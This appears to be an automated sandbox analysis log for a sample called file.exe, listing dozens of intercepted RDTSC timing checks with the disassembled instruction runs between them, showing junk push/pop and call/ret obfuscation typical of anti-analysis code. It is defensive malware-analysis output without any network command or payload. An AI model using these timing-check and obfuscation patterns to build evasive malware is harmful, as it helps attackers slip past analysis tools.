Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A086C8 second address: A0878D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c add di, BAD2h 0x00000011 call 00007FE9A87AE1EFh 0x00000016 xor dword ptr [ebp+122D2901h], ecx 0x0000001c pop edi 0x0000001d push dword ptr fs:[00000000h] 0x00000024 push 00000000h 0x00000026 push ebp 0x00000027 call 00007FE9A87AE1E8h 0x0000002c pop ebp 0x0000002d mov dword ptr [esp+04h], ebp 0x00000031 add dword ptr [esp+04h], 0000001Dh 0x00000039 inc ebp 0x0000003a push ebp 0x0000003b ret 0x0000003c pop ebp 0x0000003d ret 0x0000003e sub dword ptr [ebp+122D3052h], edi 0x00000044 mov dword ptr fs:[00000000h], esp 0x0000004b mov dword ptr [ebp+12481A39h], esi 0x00000051 mov di, cx 0x00000054 mov eax, dword ptr [ebp+122D0449h] 0x0000005a push 00000000h 0x0000005c push ebx 0x0000005d call 00007FE9A87AE1E8h 0x00000062 pop ebx 0x00000063 mov dword ptr [esp+04h], ebx 0x00000067 add dword ptr [esp+04h], 00000019h 0x0000006f inc ebx 0x00000070 push ebx 0x00000071 ret 0x00000072 pop ebx 0x00000073 ret 0x00000074 mov ebx, dword ptr [ebp+122D3608h] 0x0000007a push FFFFFFFFh 0x0000007c nop 0x0000007d jmp 00007FE9A87AE1F0h 0x00000082 push eax 0x00000083 push eax 0x00000084 push edx 0x00000085 jl 00007FE9A87AE1E8h 0x0000008b pushad 0x0000008c popad 0x0000008d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0878D second address: A0879D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9A929865Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0C936 second address: A0C93C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0F8C4 second address: A0F8CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0C93C second address: A0C94A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0C94A second address: A0C94E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0F8CA second address: A0F93C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FE9A87AE1E8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D343Fh], edi 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ecx 0x00000030 call 00007FE9A87AE1E8h 0x00000035 pop ecx 0x00000036 mov dword ptr [esp+04h], ecx 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc ecx 0x00000043 push ecx 0x00000044 ret 0x00000045 pop ecx 0x00000046 ret 0x00000047 jns 00007FE9A87AE1ECh 0x0000004d movsx ebx, di 0x00000050 push 00000000h 0x00000052 xor bh, FFFFFFADh 0x00000055 xchg eax, esi 0x00000056 push eax 0x00000057 push edx 0x00000058 jo 00007FE9A87AE1ECh 0x0000005e jp 00007FE9A87AE1E6h 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0F93C second address: A0F953 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007FE9A929865Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0F953 second address: A0F959 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0F959 second address: A0F95D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0DA01 second address: A0DA07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0DADC second address: A0DAE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A13015 second address: A1301B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1301B second address: A13035 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE9A929865Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007FE9A9298664h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A13035 second address: A1303B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1826B second address: A18271 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A18271 second address: A1828E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1828E second address: A18292 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1C903 second address: A1C90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1C90C second address: A1C91C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE9A9298656h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1C91C second address: A1C938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A87AE1F8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1C938 second address: A1C947 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a push esi 0x0000000b pop esi 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1FD79 second address: A1FD97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov eax, dword ptr [eax] 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FE9A87AE1F5h 0x0000000f jmp 00007FE9A87AE1EFh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26B12 second address: A26B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26B18 second address: A26B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26B1C second address: A26B29 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE9A9298656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26B29 second address: A26B49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FE9A87AE1F5h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26B49 second address: A26B5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FE9A9298656h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A25D5E second address: A25D7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FE9A87AE1E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pushad 0x0000000e push esi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 jnp 00007FE9A87AE1E6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A25D7A second address: A25D80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A25FF9 second address: A25FFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A25FFF second address: A26028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FE9A9298656h 0x0000000a popad 0x0000000b jne 00007FE9A929865Ah 0x00000011 push edx 0x00000012 pop edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jmp 00007FE9A9298661h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26312 second address: A26329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A87AE1F3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26329 second address: A26335 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FE9A9298656h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26499 second address: A264AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A264AF second address: A264B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A264B5 second address: A264C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FE9A87AE1E6h 0x0000000a jnp 00007FE9A87AE1E6h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A264C6 second address: A26511 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FE9A9298664h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE9A9298667h 0x00000012 jmp 00007FE9A9298668h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A266B3 second address: A266BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A266BB second address: A266C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 js 00007FE9A9298656h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A266C9 second address: A266D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FE9A87AE1E6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26845 second address: A2684A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2684A second address: A26850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A269D0 second address: A269D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B7B1F second address: 9B7B30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1EBh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2B23E second address: A2B250 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE9A9298656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007FE9A929865Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2B250 second address: A2B257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2B549 second address: A2B54F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2B7E7 second address: A2B808 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1F7h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2AF62 second address: A2AF66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2AF66 second address: A2AF6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2BD8B second address: A2BD97 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE9A929865Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2BD97 second address: A2BDC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A87AE1F1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE9A87AE1ECh 0x00000013 jng 00007FE9A87AE1E6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2BF1E second address: A2BF26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2F843 second address: A2F847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2F847 second address: A2F84D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2F84D second address: A2F852 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A34053 second address: A34058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A34058 second address: A34064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FE9A87AE1E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A34064 second address: A34068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A34068 second address: A34078 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1ECh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FCCB1 second address: 9D959F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a push ecx 0x0000000b mov dh, F3h 0x0000000d pop ecx 0x0000000e call dword ptr [ebp+122D1B21h] 0x00000014 pushad 0x00000015 jbe 00007FE9A9298658h 0x0000001b pushad 0x0000001c jmp 00007FE9A9298664h 0x00000021 jmp 00007FE9A9298665h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FCD55 second address: 9FCD5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FD22C second address: 9FD230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FD37C second address: 9FD380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FD457 second address: 9FD45D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FD45D second address: 9FD461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FD461 second address: 9FD465 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FDA86 second address: 9FDA93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FDA93 second address: 9FDA97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FDA97 second address: 9FDA9D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FDA9D second address: 9FDAA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FE9A9298656h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FDAA7 second address: 9FDAAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FDAAB second address: 9FDAEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jnp 00007FE9A929866Ch 0x0000000f call 00007FE9A9298660h 0x00000014 mov ecx, 52E85605h 0x00000019 pop ecx 0x0000001a push 0000001Eh 0x0000001c stc 0x0000001d pushad 0x0000001e movsx eax, bx 0x00000021 mov dx, ax 0x00000024 popad 0x00000025 push eax 0x00000026 jo 00007FE9A9298662h 0x0000002c ja 00007FE9A929865Ch 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FDBEE second address: 9FDC0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A87AE1F5h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FDE9F second address: 9FDEEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A9298666h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FE9A929865Fh 0x0000000f nop 0x00000010 mov dword ptr [ebp+122D2EF1h], ecx 0x00000016 movzx edx, cx 0x00000019 lea eax, dword ptr [ebp+1248EA78h] 0x0000001f mov edi, 03A41121h 0x00000024 jnc 00007FE9A9298657h 0x0000002a push eax 0x0000002b push edi 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FDEEB second address: 9FDEEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FDEEF second address: 9FDF61 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FE9A9298658h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 lea eax, dword ptr [ebp+1248EA34h] 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007FE9A9298658h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 00000019h 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 pushad 0x00000045 jmp 00007FE9A9298662h 0x0000004a mov dx, CD01h 0x0000004e popad 0x0000004f nop 0x00000050 pushad 0x00000051 pushad 0x00000052 push edx 0x00000053 pop edx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A33413 second address: A3344A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FE9A87AE1F5h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FE9A87AE1EAh 0x00000013 jmp 00007FE9A87AE1F0h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3344A second address: A3344F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3344F second address: A33455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A33455 second address: A33475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A9298667h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A33475 second address: A33479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A33722 second address: A33744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FE9A929866Eh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A33744 second address: A3379E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1F3h 0x00000007 push ebx 0x00000008 push esi 0x00000009 pop esi 0x0000000a je 00007FE9A87AE1E6h 0x00000010 pop ebx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007FE9A87AE1F0h 0x0000001b jmp 00007FE9A87AE1F4h 0x00000020 push edx 0x00000021 pop edx 0x00000022 popad 0x00000023 jmp 00007FE9A87AE1EFh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3379E second address: A337B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A9298666h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A337B9 second address: A337BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D08B second address: A3D08F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D289 second address: A3D291 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
